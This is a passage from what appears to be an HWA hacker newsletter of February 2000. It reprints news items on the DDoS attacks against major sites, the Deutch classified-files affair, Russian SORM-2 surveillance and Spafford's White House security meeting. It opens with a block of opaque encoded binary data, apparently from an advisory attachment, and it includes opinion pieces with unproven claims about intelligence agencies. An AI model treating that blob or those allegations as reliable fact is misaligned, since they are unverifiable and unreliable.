M[0C1`$P)#@&F"5(!^PF<`4H*[`&3"D$"U0J<`A$+_`)%"V`#<@O'`Y<+,02T M"YX$R`L-!=4+?07:"_P%C@O\!8X+X`6*"X@%?@L;!6D+L`1,"T8$)PO?`_H* M>P/&"AH#BPJ^`DD*9@(`"A4"L@G(`5T)@@$$"4,!I@@*`40(V0#>![``=@>. M``P'=`"@!F,`,@9:`/\%60`(````^@(```$``0``````!````"T!`@`$```` M\`$``(P````D`T0`;P?\!?\%_`7_!90+\064"_$%V@LG!MH+EP;1"P8'P`MT M!Z<+X`>&"TD(70NN""P+$`GT"FT)M0K%"6\*&`HC"F4*T0FL"GD)[`H<"24+ MNPA6"U8(@`OM!Z(+@@>\"Q4'S@NE!M<+-0;:"_P%C@O\!8X+'@:&"XP&=POY M!E\+8P<_"\P'%PLR".@*E0BQ"O0("8P'GPE^ M!XP)>0<="7X'#0EZ!_,(?@??"($'D@B(!R<(A@?=!VL'-0=U!^,&<@>A!F@' M6`9W!R(&>0&"TD(70NN""P+$`GT"FT)M0K%"6\*&`HC"F4*T0FL"GD)[`H<"24+NPA6 M"U8(@`OM!Z(+@@>\"Q4'S@NE!M<+-0;:"_P%C@O\!8X+'@:&"XP&=POY!E\+ M8P<_"\P'%PLR".@*E0BQ"O0("8P'GPE^!XP) M>0<="7X'#0EZ!_,(?@??"($'D@B(!R<(A@?=!VL'-0=U!^,&<@>A!F@'6`9W M!R(&>0 dildog@l0pht.com [ For more advisories check out http://www.l0pht.com/advisories.html ] L-ZERO-P-H-T @HWA 166.0 ISN:FBI views hackers as 'racketeers' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list http://www.apbnews.com/newscenter/internetcrime/2000/02/16/hackers0216_01.html WASHINGTON (AP) [2.16.00] -- The nation's top law enforcement officials today described "fast-developing leads" in finding the electronic vandals who shut down major Internet sites last week. But they also acknowledged serious challenges in the manhunt, saying the hackers were sophisticated enough to falsify their digital fingerprints. Attorney General Janet Reno said such a disguise technique "makes it difficult, and sometimes impossible, to hold the perpetrator criminally accountable." "I would simply say that we are taking the attacks very seriously and that we will simply do everything in our power to identify those responsible and bring them to justice," Reno told a Senate panel. FBI Director Louis J. Freeh, who also testified, said there were "fast-developing leads as we speak, and hopefully we can provide more details in coming days." He said FBI field offices in five cities have opened investigations into the attacks: Los Angeles, San Francisco, Atlanta, Boston and Seattle. More agents in other cities and overseas are also involved. A coordination problem Reno and Freeh also conceded important shortcomings in coordinating the myriad government agencies and public and private experts who help investigate high-tech crimes. "We're not doing so good," admitted Freeh, adding that cooperation was improving. The FBI also urged Congress today to consider expanding use of federal racketeering "RICO" laws -- traditionally used against the Mafia and drug cartels -- to apply against organized and persistent hackers. It also urged Congress to lower the $5,000 minimum in damages that victim companies must suffer before attackers can be prosecuted under federal computer crime laws. Freeh said lawmakers should consider "whether some of this activity, which goes beyond a single episode of fraud or hacking, gets into the realm of enterprise criminal activity." "RICO was intended to get gangsters," said Jennifer Granick, a California lawyer who has represented hackers. "Now, it's getting a bunch of kids in black concert T-shirts." Freeh said hackers in many of last week's attacks falsified the Internet addresses of the computers they used, "meaning that the address that appeared on the target's log was not the true address of the system that sent the messages." 'An insidious, organized attack' EBay Inc. disclosed new details today about the Feb. 8 electronic assault launched against it, which shut down the world's largest online auction site for 90 minutes. Similar attacks disrupted other major commercial sites, including those of Yahoo, Amazon.com, Buy.Com, CNN and E*Trade. EBay's lawyer, Robert Chestnut, described an "insidious, organized attack" that was "obviously well planned." The attackers flooded eBay's site with 10 times its normal incoming data, transmitting a specific type of information identical to that used against Yahoo on Feb. 7. Chestnut told the Appropriations Subcommittee on Commerce, Justice, State and Judiciary that eBay also was attacked the evening of Feb. 9, but engineers were able to repel the second attack quickly. The FBI is contacting several hackers, known by their online nicknames. The bureau would not say whether its agents have talked with any suspects, but it appeared some interviews have begun, hacker sources said. Transportation Department sites hit The testimony from Reno and Freeh followed President Clinton's meeting Tuesday with technology experts about ways to improve Internet security. Participants said that during the talks, industry leaders urged the government to lead by example by making its computer systems secure. But overnight Tuesday, a hacker vandalized at least four Web sites at the Transportation Department, including the page for the agency's information officer, George Molaski. Those attacks were first noted by Attrition.Org, acomputer security Web site that records such hacks. The computer breached by the hacker "was in the process of being fixed," Molaski said today. "Unfortunately, they got to it before we closed that door. It was a relatively simple vulnerability." Also today, House Commerce Chairman Tom Bliley, R-Va., criticized "highly vulnerable" computers at the Environmental Protection Agency (EPA), urging it to shut down its Internet connection immediately, citing an unreleased report by the General Accounting Office. EPA spokesman David Cohen said the agency has no plans to disable Internet access, adding that experts there have taken steps to strengthen security of computers with sensitive information. --------------------------------------------------- "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *=================================================* ISN is sponsored by Security-Focus.COM @HWA 167.0 ISN:Pentagon probe targets Deutch ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list http://www.washtimes.com/national/news1-02172000.htm (The Washington Times) [2.17.00] The Pentagon is investigating whether ultrasecret "black programs" were compromised by former CIA Director John Deutch after he put details about some of the Defense Department's most sensitive activities on his home computers. Defense and intelligence officials said the Pentagon recently set up a special panel to examine a personal diary containing highly classified defense information that was kept improperly on Mr. Deutch's home computers desktop and laptop systems that were used to access the Internet and had received e-mail messages from abroad. The CIA, meanwhile, launched a "damage assessment" to determine whether its secrets were compromised by Mr. Deutch, who was CIA director from 1995 to 1996. The CIA withheld information from the Pentagon about what are known as "special access programs" for more than a year and only provided it after news reports highlighted the security breach earlier this month. Special-access programs are so secret that officials privy to them are authorized to lie to keep them from becoming public. Most are kept secret from the CIA and only disclosed to the Pentagon's top three or four officials. Mr. Deutch was briefed on many of these programs when he was undersecretary of defense for acquisitions and later deputy secretary of defense from 1993 to May 1995, when he became CIA director. Most of the programs have been ongoing for the past seven years. Rear Adm. Craig Quigley, a Pentagon spokesman, said a team of defense security officials was set up 10 days ago to review the material first uncovered in Mr. Deutch's diary by CIA security officials in January 1997. Adm. Quigley said a damage assessment could result from the investigation but that none had been launched yet. "Let's just see what we find," he said. An intelligence official said the information on the black programs "was in some ways even more sensitive than the CIA" secrets kept on the home computers. The CIA information included details of agency covert action programs. Among the black programs currently under way are efforts to develop new weapons and methods of warfare, including electronic "information warfare" and how the U.S. military plans to conduct it in the future. They also include highly sensitive intelligence and collection development programs for future operations. That information is known to be a major target of foreign intelligence services from Russia, China and other nations. Other defense officials said privately the fact that details of special-access programs were kept on computers that are not secure is a security breach because of the sensitive nature of the programs. They said both Defense Secretary William S. Cohen and Deputy Defense Secretary John Hamre have resisted calls from officials involved in the programs to conduct a damage assessment. They did not say why. However, the Senate Select Committee on Intelligence is investigating whether the CIA covered up the Deutch affair to protect the nation's top intelligence official from punishment for mishandling secrets. Mr. Deutch declined to comment through his lawyer, Terry O'Donnell. The CIA recently launched a damage assessment of whether its secrets were compromised by Mr. Deutch's use of home computers to keep highly sensitive information after leaving the agency in December 1996, an intelligence official said. According to officials who have seen an inspector general report on the matter, the home computers were not secured and had been used to access pornographic Internet sites by someone in Mr. Deutch's household. Investigators also found that one of Mr. Deutch's computers had received an e-mail message from a Russian scientist living in Western Europe. In addition to the review team looking into the Deutch diary, Adm. Quigley said the Pentagon inspector general recently started an investigation into how the material ended up on four removable computer cards used by Mr. Deutch's Macintosh computers. "They're both ongoing," Adm. Quigley said of the investigations. In a related development, senior CIA officials failed to notify the Justice Department about possible criminal and ethical violations by Mr. Deutch shortly after the secrets were found on his home computer. CIA security officials uncovered "clear evidence" in early 1997 that Mr. Deutch may have violated three laws in using CIA-supplied home computers for personal use and for keeping and deleting secret information, said agency officials who spoke on the condition of anonymity. However, the Justice Department was never notified of the violations until months later. The FBI was first told about the security breach by Michael O'Neill, the CIA general counsel and friend of Mr. Deutch, in a telephone call. However, the FBI did not investigate the matter because there was no evidence of foreign government involvement, the officials said. When the Justice Department was notified in April 1998 of possible crimes, only one of the three laws was cited. A CIA official said senior agency managers deliberately focused on the possible disclosure of secrets to foreign powers because they knew those charges would not be pursued. The managers were not identified by name. "Nobody here ever claimed that he sold secrets to the Russians or even gave them anything," the official said. "Senior CIA officials knew nobody would prosecute him for that. . . . And the Justice Department didn't want the bad publicity so they went along with the charade." The "crime report" sent to Justice from the CIA inspector general in 1998 also referred to a possible espionage-related offense that the official said was a "red herring" meant to distract attention from other serious crimes. Investigators planned to notify the Justice Department about "three crimes we knew were sure-fire violations with clear evidence, but the chiefs said 'no,' " the official said. The three violations included: * A law that provides for up to one year in prison for unauthorized removal or retention of classified documents. * A law that provides for up to three years in prison for concealing or attempting to destroy or remove government documents. * A law making it illegal to work on personal projects where a financial interest is involved. Security officials said the Government Ethics Office was never notified about one of the possible crimes related to Mr. Deutch's no-fee contract he arranged after leaving the CIA in December 1996. A spokesman for the Ethics Office said it was never informed about the possible conflict of interest. The CIA official said Mr. Deutch's CIA contract may have been illegal because the only reason for it was for Mr. Deutch to avoid having to buy his own computers. The official said the contract also appeared to be part of an effort by Mr. Deutch to avoid having to return the home computers to the CIA because he was fearful the improperly stored documents would be discovered. The CIA official also faulted current CIA Director George Tenet for failing to report the crimes to the Justice Department. The law required the CIA director to "expeditiously report" information about violations of Title 18 to the Justice Department. --------------------------------------------------- "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *=================================================* ISN is sponsored by Security-Focus.COM @HWA 168.0 ISN:US Embassy's software originated back in the USSR ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list http://www.telegraph.co.uk:80/et?ac=000114832908976&rtmo=02xKsKGq&atmo=ggggg3JK&pg=/et/00/2/17/wspy17.html (The Daily Telegraph) [2.17.00] The State Department faced its second major security embarrassment in three months after admitting that it had sent its embassies a piece of software written by citizens of the former Soviet Union. In December, the department conceded that it had found a sophisticated listening device implanted in the walls of a conference room on what is supposed to be the most secure part of the building. A Russian diplomat was arrested and expelled after he was observed by the FBI monitoring the device from outside. The new security lapse occurred on Feb 2 when all American missions and embassies around the world were sent an urgent cable telling them to remove a piece of software from their mainframe computers. The programme had been written by a company called Synergy International Systems, which is based in Vienna, Virginia, but is owned by Armenians. The company, whose website says it also has offices in Moscow and Guatemala, says there is no security problem and that they are confident an internal review by the FBI will clear them of any suspicion. So far, investigators have not found any evidence of malpractice. The main fears are that the software could contain a hidden code that could download sensitive information from embassy computers or install bugs that could cause crashes in the system at critical moments. Bonnie Cohen, a senior administrator at the State Department, was quoted in the Washington Post yesterday as saying: "On the face of it, from what we know so far, it's an extraordinary lapse of judgment." The latest security scare follows the admission by the CIA that John Deutch, a former director, took top secret files home and installed them on his own computer, which he also used to look at the internet. --------------------------------------------------- "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *=================================================* ISN is sponsored by Security-Focus.COM @HWA 169.0 ISN:Hacker posts phony press release ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list http://www.marketwatch.newsalert.com/bin/story?StoryId=CokUaubebDxmTAgfJA2vK&FQ=v%25upi&Title=Headlines%20for%3A%20v%25upi%20 ANN ARBOR, Mich., Feb. 17 (UPI) [2.17.00] - Aastrom Biosciences Inc. Thursday initiated an investigation after a computer hacker posted a fake press release on its Web site announcing a merger with Geron Inc., a California biopharmaceutical company. Aastrom officials said they think the hacker was trying to manipulate the stock of both companies. Aastrom fell to 4 9/16 in early trading while Geron rose $9 to 56 . Aastrom President and CEO R. Douglas Armstrong said there was nothing to the merger announcement. "We are appalled by this ruthless attempt to manipulate markets and potentially harm the shareholders of both companies," Armstrong said. He apologized to shareholders and said the company was investigating security on its Web site. Geron said it was not conducting any merger talks with Aastrom. Aastrom officials discovered the fake press release on the web site Thursday morning and contacted Nasdaq and law enforcement authorities. The Ann Arbor, Mich., firm is developing technology to help replace cells damaged by cancer chemotherapy and holds patents on ways to grow human stem cells. Aastrom traded for as little as 31 cents a share in October but is considered a mover after reaching a 52-week high of $6.44 on Monday. Geron, of Menlo Park, Calif., is involved in research on aging, cancer and other age-related chronic diseases. --------------------------------------------------- "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *=================================================* ISN is sponsored by Security-Focus.COM @HWA 170.0 ISN:Hacker, Media Hype and, Disinformation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list http://cryptome.org/madsen-hmhd.htm 17 February 2000. Thanks to Wayne Madsen HACKERS, MEDIA HYPE, AND DISINFORMATION WAYNE MADSEN For what it is worth, I am a 20-year veteran of the computer security community. I have served in the Navy, National Security Agency, State Department, Computer Sciences Corporation, RCA, and have consulted on computer security with the National Institute of Standards and Technology, international banks, telecom companies and even firms that manufacture candy. While working for the FBI and Naval Investigative Service, I put one US Navy official in Federal prison for espionage and other crimes, and I was involved in U.S. counter-terrorism work in Greece and the Philippines. I think I know how the "spook" community operates and, more importantly, how it thinks. The hype associated with the recent Internet flooding is outrageous and serves the agendas of the military and intelligence communities regarding new vistas for bloated Pentagon and espionage budgets. On 17 February, National Public Radio's Diane Rehm Show had a round table discussion featuring James Adams, a former London Sunday Times reporter in Washington who is now a drum beater for information warfare, and Jeffrey Hunker, the former head of the White House Critical Infrastructure Assurance Office. Adams suggested that for critical infrastructure protection certain civil liberties must be forfeited. He also stated that Internet transactions should not be afforded the same degree of privacy as the U.S. mail. Hunker was uncomfortable that some people think that scare mongering has been at the center of the recent packet flooding of the Internet. Adams supported the CIA's creation of IN-Q-IT, a CIA Trojan Horse in the Silicon Valley. According to Adams, Science Applications International Corporation (SAIC), a virtual CIA proprietary firm, is funding, through IN-Q-IT, a program called Net Eraser. None of the participants in the Rehm Show were willing to talk about Net Eraser and some seemed very nervous about discussing it in detail. This radio program is highly indicative of the current hype surrounding the Distributed Denial of Service (DDOS) attacks on DOT COM sites on the Internet. Even the use of the acronym DDOS is amazing. Here they are, twenty-something DOT COM executives, who probably never thought about computer security except for watching re-runs of "Hackers" and "Sneakers," using Pentagon-originated terms like "Distributed Denial of Service" attacks. Why? Who told them to use those terms? Then Clinton manages to take 90 minutes to attend an Internet security summit on February 15. Northern Ireland's peace agreement is falling apart, the Israeli-Palestine agreement is unraveling, and Russia's new President is putting ex-KGB agents in his government, but Clinton has enough time to talk with a group of e-commerce barons, computer security geeks, and even one hacker. The whole thing appeared to be staged and scheduled way in advance. The whole so-called Internet "hack" smells of a perception management campaign by the intelligence community. Perhaps the system flooding was coordinated by one group -- however, those types of attacks probably occur on a daily basis without being reported by the world's media. It is important to note that one of the key components of information warfare -- according to the Pentagon's own seminal documents -- is perception management -- psychological operations to whip up public support for a policy or program. The early Defense Science Board reports on Critical Infrastructure Protection actually call for a campaign to change the public's attitude about information system and network security. The Pentagon is a master at deception campaigns aimed at the news media. They constantly broadcast disinformation to television and radio audiences in Haiti, Serbia, Colombia, Mexico and elsewhere. They are now extending this to cyber space. Critical infrastructure protection is a masterful ruse aimed at creating the myth of impeding cyber-peril. The major domo is a weird chap named Richard Clarke, a Dr. Strangelove-type character who is Clinton's counter-terrorism czar. He always talks about defensive cyber-warfare but clams up when it comes to offensive US cyber-operations. That is classified. However, it is certain that the US Government has already done more to disrupt the Internet than any other actor -- state-sponsored or freelance. For the past few years, US government hackers have penetrated networks at the European Parliament, Australian Stock Exchange, and banks in Athens, Nicosia, Moscow, Johannesburg, Beirut, Tel Aviv, Zurich, and Vaduz. The US also engaged in network penetrations in Yugoslavia during the NATO war against that country. Why doesn't NPR, CBS, ABC, NBC and the others focus on what the US is doing to disrupt the Internet? They are instead falling into a familiar Pentagon trap of deception and diversion. --------------------------------------------------- "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *=================================================* ISN is sponsored by Security-Focus.COM @HWA 171.0 ISN:US Secret agents work at Microsoft ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list http://www.theage.com.au/breaking/0002/19/A27800-2000Feb19.shtml Source: AFP | Published: Saturday February 19, 7:44 AM PARIS, Feb 18 - A French intelligence report today accused US secret agents of working with computer giant Microsoft to develop software allowing Washington to spy on communications around the world. The report, drawn up by the Strategic Affairs Delegation (DAS), the intelligence arm of the French Defence Ministry, was quoted in today's edition of the news-letter Le Monde du Renseignement (Intelligence World). Written by a senior officer at the DAS, the report claims agents from the National Security Agency (NSA) helped install secret programmes on Microsoft software, currently in use in 90 per cent of computers. According to the report there was a 'strong suspicion' of a lack of security fed by insistent rumours about the existence of spy programs on Microsoft, and by the presence of NSA personnel in Bill Gates' development teams. The NSA protects communications for the US government, and also intercepts electronic messages for the Defence Department and other US intelligence agencies, the newsletter said. According to the report, 'it would seem that the creation of Microsoft was largely supported, not least financially, by the NSA, and that IBM was made to accept the (Microsoft) MS-DOS operating system by the same administration.' The report claimed the Pentagon was Microsoft's biggest client in the world. @HWA 172.0 ISN:Greek hackers attack U.S military installation? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list Hello, FYI, the Greek newspaper TA NEA has a story today about hacking attempts from three Greek Universities against an Arizona DoD installation. The article says that the US government asked the Greek one to find those responsible and have them being interrogated by US agents. It seems, the hackers managed to eventually crack the systems' security. No more news is available yet, but this must be the first time that something like that is said to be done through Greek servers. If there is any other info... T.B ISN is sponsored by Security-Focus.COM @HWA 173.0 ISN:KGB successor paid to infiltrate internet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list http://www.techserver.com/noframes/story/0,2294,500171461-500220807-501048365-0,00.html By SERGEI SHARGORODSKY MOSCOW (February 21, 2000 9:07 p.m. EST http://www.nandotimes.com) - The KGB's successor is now also spying on the Internet, raising fears that the information it collects could be used for blackmail and business espionage. "The whole Federal Security Service will be crying tomorrow over your love letters," warns one of the banners angry Russian Web designers have posted on the Internet. Russian human-rights and free-speech advocates say the security service has already forced many of the country's 350 Internet service providers to install surveillance equipment. "Most Internet providers in Moscow, including all the large providers and many in the provinces, have opened a hole" for security agents to peep at traffic, said Anatoly Levenchuk, a Russian Internet expert. Like its counterparts in other countries, the Federal Security Service may argue it needs the monitoring system to catch spies, terrorists and bandits, and to combat black-market businesses and capital flight. But the system has raised particular alarm in Russia, where memories of KGB surveillance and repression remain fresh. And the abundance of secretly filmed, juicy videotapes and transcripts of telephone conversations in Russia seems to justify the fear of blackmail by renegade security agents or others who get hold of the information. Free-speech activists fear that the Internet surveillance is evidence of the security services' resurgence under acting President Vladimir Putin, a 15-year KGB veteran. They have already accused him of chipping away at press freedoms championed by former President Boris Yeltsin. Last week, a government official for the first time publicly acknowledged the existence of the Internet control project, called the System of Operative and Investigative Procedures or SORM-2, its Russian acronym. Alexei Rokotyan, the Communications Ministry's electronic communications department chief, denied that the project was aimed at "total control of the information that is transmitted via the global network." "Security organs and special forces have the right - and now the capability - to monitor private correspondence and telephone conversations of individual citizens according to the law," The Moscow Times daily quoted him as saying. Levenchuk and others said the Federal Security Service has been quietly implementing the system at least since 1998. "As you look at all these Orwellian things you understand it's coming - total control, total surveillance," Levenchuk told a round table held in St. Petersburg. Federal Security Service officials apparently view the steps simply as an extension of SORM regulations enacted in the mid-1990s, which allow security agents with a warrant to tap telephones and Internet traffic. At a series of meetings with Internet providers in 1998, security service officials described a system that would involve a box installed in providers' computers that would route electronic traffic to the local security service headquarters through a high-speed link. The project still seems a far cry from Echelon, a high-tech spying network which, according to a European Parliament report, is coordinated by the U.S. National Security Agency and involves "routine and indiscriminate" monitoring of electronic communications around the world. But Russia's Internet freedom activists are still raising the alarm. Levenchuk's www.libertarium.ru site is filled with accounts from mostly provincial providers that say they were forced to install SORM-2 equipment. One provider in southern Volgograd, Bayard-Slavia Communications, actually refused when security service agents sought to "receive full and uncontrolled access to all our clients and their communications," its chief Nail Murzakhanov said. Bayard-Slavia had its main communication line cut off and faced threats of fines from government officials. But it won a court case against the security service last fall. Human rights advocates said Murzakhanov's confrontation with the Federal Security Service was enough to persuade many a reluctant provider. But Anton Nosik, who edits the Vesti.Ru and Lenta.Ru electronic newspapers, said the case was rare and that he was not aware of any major providers complying with the SORM-2 directives. Nosik was less concerned than others, saying security service agents already have access to electronic traffic and would not be able to monitor its ever-increasing volumes in full. "Yet there is an unpleasant trend of security services trying to implement non-constitutional norms," he said. "This should not be allowed." --------------------------------------------------- "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *=================================================* ISN is sponsored by Security-Focus.COM @HWA 174.0 ISN:REVIEW: Security Technologies for the World Wide Web ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list From: "Rob Slade, doting grandpa of Ryan and Trevor" BKSCTCWW.RVW 20000113 "Security Technologies for the World Wide Web", Rolf Oppliger, 2000, 1-58053-045-1 %A Rolf Oppliger rolf.oppliger@acm.org,oppliger@computer.org %C 685 Canton St., Norwood, MA 02062 %D 2000 %G 1-58053-045-1 %I Artech House/Horizon %O 800-225-9977 fax: 617-769-6334 artech@artech-house.com %P 419 p. %T "Security Technologies for the World Wide Web" In the preface, the author states that the book is first intended for Webmasters, who need practical configuration information, then for users who have security concerns, and finally for Web and electronic commerce developers. He also says that the book can be used as an introduction, for self-study, as a course text, and as a reference. A pretty tall order, but, by and large, Oppliger does a reasonable job of fulfilling the entire mandate. Chapter one, as an introduction, is possibly more than most people want to know. However, the extra information (such as the explanation of HTTP [HyperText Transfer Protocol] requests and responses) does help provide an understanding of the underlying actions and concepts which are needed for a thorough view of security operations and requirements. There is a detailed presentation of HTTP access control methods in chapter two. The introduction to firewalls, in chapter three, is complete and helpful, with a wealth of user level information that is all too often omitted. Chapter four is a solid introduction to the basics of cryptography. Channel security at the data link, transfer, and application layers is the theme of chapter five, touching on tunneling, VPNs (Virtual Private Networks), IPsec, and various application protocols. Chapter six expands two of these with details on the Secure Sockets Layer (SSL) and Transport Layer Security (TLS). Chapter seven gives an overview of electronic payment systems, with brief descriptions of the most common electronic cash, debit, and credit schemes. The management of certificates, in chapter eight, mostly covers ongoing work in key infrastructure, with a good discussion of the important and difficult question of certificate revocation. A fair and realistic review of active content is provided in chapter nine. For slightly less active content, chapter ten discusses and shows examples of more secure practices for CGI (Common Gateway Interface) and API (Application Programming Interface) work. Mobile code and agents are still really future technology, and so are the proposed security functions in Chapter eleven. The copyright discussion in chapter twelve is a little disappointing, since it seems primarily concerned with watermarking. Chapter thirteen looks at privacy, being dealt with by amateurs as usual, and, as usual, providing glimpses of fascinating work that is not widely known. There is a brief overview of censorship systems and problems in chapter fourteen. Chapter fifteen concludes with a somewhat pessimistic review of the situation. The bibliographies at the end of every chapter contain solid works, and can be useful to those wanting further information. They do, however, have a very definite academic flavour, in that most of the entries are articles or conference presentations, with books and online references making up a smaller portion of the whole. Oppliger's writing is rather dry and academic in tone, but the material presented is realistic, useful, and conceptually complete. Despite the disparate audience range, the author has managed to provide something of value for all. For the Web workers who are the primary audience, this book provides, if not a cookbook for security, a complete picture of the various aspects that must be addressed. copyright Robert M. Slade, 2000 BKSCTCWW.RVW 20000113 ISN is sponsored by Security-Focus.COM @HWA 175.0 ISN:Infosecurity at the White House ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list [Note: you may post this account or forward it to mailing lists, provided you pass the account and this notice in its entirety.] Infosecurity at the White House Gene Spafford Prolog Last week (ca. 2/8/00), a massive distributed denial of service attack was committed against a number of Internet businesses, including e-Bay, Yahoo, Amazon.com, and others. This was accomplished by breaking into hundreds (thousands?) of poorly-secured machines around the net and installing packet generation "slave" programs. These programs respond by remote control to send packets of various types to target hosts on the network. The resulting flood effectively shut those target systems out of normal operation for periods ranging up to several hours. The press jumped all over this as if it was something terribly new (it isn't -- experienced security researchers have known about this kind of problem for many years) and awful (it can be, but wasn't as bad as they make it out to be). One estimate in one news source speculated that over a billion dollars had been lost in lost revenue, downtime, and preventative measures. I'm skeptical of that, but it certainly is the case that a significant loss occurred. Friday, Feb 11, I got a call from someone I know at OSTP (Office of Science and Technology Policy) inquiring if I would be available to meet with the President as part of a special meeting on Internet security. I said "yes." I was not provided with a list of attendees or an agenda. Initially, I was told it would be a meeting of security experts, major company CEOs, and some members of the Security Council, but that was subject to change. The Meeting I arrived at the Old Executive Office Building prior to the meeting to talk with some staff from OSTP. These are the people who have been working on the Critical Infrastructure issues for some time, along with some in the National Security Council. They really "get it" about the complexity of the problem, and about academia's role and needs, and this may be one reason why this was the first Presidential-level meeting on information security that included academic faculty. After a few minutes, I was ushered into Dr. Neal Lane's office where we spent about 15 minutes talking. (As a scientist and polymath, I think Lane has one of the more fascinating jobs in the Executive Branch: that of Assistant to the President for Science and Technology and Director of OSTP . For instance, on his table he had some great photos of the Eros asteroid that had been taken the day before.) We then decided to walk over to the White House (next door) where we joined the other attendees who were waiting in a lobby area. Eventually, we were all escorted upstairs to the Cabinet Room. It was a tight fit, as there were over 30 of us, staff and guests (invitee list at the end). We then spent a half hour mingling and chatting. There were a lot of people I didn't know, but that's because normally I don't get to talk to CEOs. Most notably, there were people present from several CERIAS sponsor organizations (AT&T, Veridian/Trident, Microsoft, Sun, HP, Intel, Cisco). I also (finally!) got to meet Prof. David Farber in person. We've "known" each other electronically for a long time, but this was our first in-person meeting. After a while, some more of the government folk joined the group: Attorney General Reno; Commerce Secretary Daley; Richard Clarke, the National Coordinator for Security, Infrastructure Protection and Counter-terrorism; and others. After some more mingling, I deduced the President was about to arrive -- several Secret Service agents walked through the room giving everyone a once-over. Then, without any announcement or fanfare, the President came into the room along with John Podesta, his chief of staff. President Clinton worked his way around the room, shaking everyone's hand and saying "hello." He has a firm handshake. In person, he looks thinner than I expected, and is not quite as tall as I expected, either. We all then sat down at assigned places. I had the chair directly opposite the President. Normally, it is the chair of the Secretary of State. To my left was Whit Diffie of Sun, and to my right was John Podesta. I was actually surprised that I had a seat at the table instead of in the "overflow" seats around the room. The press was then let into the room. It was quite a mass. The President made a statement, as did Peter Solvik of Cisco. The press then asked several questions (including one about oil prices that had nothing to do with the meeting). Then, they were ushered out and the meeting began. The President asked a few individuals (Podesta, Daley, Reno, Pethia, Noonan) to make statements on behalf of a particular segment of industry of government, and then opened it up for discussion. The next hour went by pretty quickly. Throughout, the President listened carefully, and seemed really involved in the discussion. He asked several follow-up questions to things, and steered the discussion back on course a few times. He followed the issues quite well, and asked some good follow-up questions. During the discussion, I made two short comments. The first was about how it was important that business and government get past using cost as the primary deciding factor in acquiring computer systems, because quality and safety were important. I went on to say that it was important to start holding managers and owners accountable when their systems failed because of well-known problems. I observed that if the government could set a good example in these regards, others might well follow. My second comment was on the fact that everyone was talking about "business and government" at the meeting but that there were other players, and that academia in particular could play an important part in this whole situation in cooperation with everyone else. After all, academia is where much of the research gets done, and where the next generation of leaders, researchers, and businesspeople are coming from! Overall, the bulk of the comments and interchange were reasoned and polite. I only remember two people making extreme comments (to which the rest of us gave polite silence or objections); I won't identify the people here, but neither were CERIAS sponsors :-). One person claimed that we were in a crisis and more restrictions should be placed on publishing vulnerability information, and the other was about how the government should fund "hackers" to do more offensive experimentation to help protect systems. My summary of the major comments and conclusions is included below. After considerable discussion, the meeting concluded with Dick Clarke reminding everyone that the President had submitted a budget to Congress with a number of new and continuing initiatives in information security and cybercrime investigation, and it would be up to Congress to provide the follow-through on these items. We then broke up the meeting, and the President spent a little more time shaking hands and talking with people present. Buddy (his dog) somehow got into the room and "met" several of us, too -- I got head-butt in the side of my leg as he went by. :-) The official photographer got a picture of the President shaking my hand again. The President commented to Vint Cerf how amazed he was that the group had been so well-behaved --- we listened to each other, no one made long rambling speeches, and there was very little posturing going on. Apparently, similar groups from other areas are quite noisy and contentious. We (the invitees) then went outside where there was a large crowd of the press. Several of us made short statements, and then broke up into groups for separate interviews. After that was done, I left and returned home to teach class on Wednesday. My interview with the local news station didn't make it on the 6pm news, and all the print accounts seemed make a big deal of the fact that "Mudge" was at the meeting. Oh well, I thought "Spaf" was a way-cool "handle", better than "Mudge" but it doesn't go over as well with the press for some reason. I'll have to find some other way to develop a following of groupies. :-) On Friday, I was back in DC at the White House conference center to participate in a working session with the PCAST (President's Committee of Advisors on Science & Technology) to discuss the structure and organization of the President's proposed Institute for Information Infrastructure Protection. This will have a projected budget of $50 million per year. CERIAS is already doing a significant part of what the IIIP is supposed to address (but at a smaller scale). Thus, we may have a role to play in that organization, as will (I hope) many of the other established infosec centers. The outcome of that meeting was that the participants are going to draft some "strawman" documents on the proposed IIIP organization for consideration. I am unsure whether this is significant progress or not. Outcomes I didn't enter the meeting with any particular expectations. However, I was pleasantly surprised at the sense of cooperation that permeated the meeting. I don't think we solved any problems, or even set an agenda of exactly what to do. There was a clear sense of resistance from the industry participants to any major changes in regulations or Internet structure. In fact, most of the companies represented did not send CEOs so that (allegedly) there would be no one there who could make a solid commitment for their firms should the President press for some action. Nonetheless, there were issues discussed, some subsets of those present did agree to meet and pursue particular courses of action, and we were reminded about the President's info protection plan. To be fair, this is an area that has been getting attention from the Executive Branch for several years, so this whole event shouldn't be seen as a sudden reaction to specific events. Rather, from the PCCIP on, there has been concern and awareness of the importance of these issues. This was simply good timing for the President to again demonstrate 